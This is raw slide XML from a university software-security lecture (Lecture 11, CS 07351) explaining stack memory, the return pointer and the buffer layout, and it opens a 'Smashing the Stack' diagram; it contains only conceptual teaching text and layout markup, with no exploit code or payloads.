                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="922338">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="922338">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="922338">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fld id="{17206119-959E-C848-9F77-9EA6434D73FF}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164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4867" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Programs call their subroutines, allocating memory space for function variables on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The stack is like a scratchpad for storing little items to remember</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The stack is LIFO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>You push things on the top of the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>You pop things from the top of the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The return pointer (RP) contains the address of the calling function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336448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93F3C3-6165-9C4D-B9A6-BC2D67D28D12}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19042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07B331-2998-3D40-AD31-5DC517D03855}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25093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2AEB12-BA3C-2E46-9ED1-ECAE1F55188A}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201093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6328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346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457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r>
              <a:rPr lang="en-US"/>
              <a:t>These slides are the intellectual property of SFI and may not be used or duplicated by other parties without express written consent.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Lesson 5, slide - </a:t>
            </a:r>
            <a:fld id="{F2B1F056-660E-DC4C-B6C0-3C2D9032160A}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="268026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6F2A1E-A94D-0E48-BBCD-B06E4D77FDDE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9858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24462FA-6198-DD44-A384-AC0C2CD3CE15}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13932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AB33C0-AEBA-814F-AF43-AA188C3FFE2B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8039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630B84D-6D78-9B4B-9AA6-CC1D03057C06}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2555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4BA909-3EDF-1543-8F7A-347540D92EE0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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85800" y="609600"/>
            <a:ext cx="7772400" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19256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D0FF58-3F58-2540-A302-A3B28C622698}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20344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12D6F3-A7DF-CE4D-B6FB-0598B1A4AFF5}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2926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fld id="{39E0A7DF-D6DB-A64C-9848-481A93039F43}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="1143000"/>
            <a:ext cx="7772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315200" y="549564"/>
            <a:ext cx="1143000" cy="5299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eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00407A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lecture 11: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" altLang="en-US" sz="3200" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00407A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Software Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00407A"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </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CS 07351: Cyber Security: Fundamentals, Principles and Applications</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Dr. Vahid Heydari</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16617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t>What is a Stack?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101381" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="2065338"/>
            <a:ext cx="1828800" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC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1382" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="2979738"/>
            <a:ext cx="1828800" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC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1383" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="3894138"/>
            <a:ext cx="1828800" cy="547687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF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1384" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="4427538"/>
            <a:ext cx="1828800" cy="547687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCFFCC"/>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1385" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5181600" y="16081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1386" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3352800" y="49609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1387" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5181600" y="49609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1388" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3352800" y="16081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1390" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="4960938"/>
            <a:ext cx="10064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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Top of Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101391" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="1484313"/>
            <a:ext cx="13112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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Bottom of Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101392" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3406775" y="2141538"/>
            <a:ext cx="177641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Buffer 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>(Local Variable 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101393" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3406775" y="3055938"/>
            <a:ext cx="177641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Buffer 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>(Local Variable 1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101394" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5492750" y="1531938"/>
            <a:ext cx="9858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Fill</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Direction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101395" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="4014788"/>
            <a:ext cx="149383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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Return Pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101396" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3579813" y="4398963"/>
            <a:ext cx="1370012"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Function Call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Arguments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101399" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="1455738"/>
            <a:ext cx="227013"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b="1">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101400" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="4922838"/>
            <a:ext cx="227013"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b="1">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101401" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="1676400"/>
            <a:ext cx="0" cy="1143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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14477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a:t>Smashing the Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176132" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="2065338"/>
            <a:ext cx="1828800" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC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6133" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="2979738"/>
            <a:ext cx="1828800" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC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6134" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="3894138"/>
            <a:ext cx="1828800" cy="547687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF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6135" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="4427538"/>
            <a:ext cx="1828800" cy="547687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCFFCC"/>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6136" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5181600" y="16081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37" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3352800" y="49609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38" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5181600" y="49609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39" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3352800" y="1608138"/>
            <a:ext cx="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40" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="4960938"/>
            <a:ext cx="10064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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Top of Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176141" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="1484313"/>
            <a:ext cx="13112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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Bottom of Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176142" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3406775" y="2141538"/>
            <a:ext cx="177641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Buffer 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>(Local Variable 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176144" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5492750" y="1531938"/>
            <a:ext cx="9858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Fill</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Direction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176146" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3579813" y="4398963"/>
            <a:ext cx="1370012"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Function Call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Arguments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176147" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
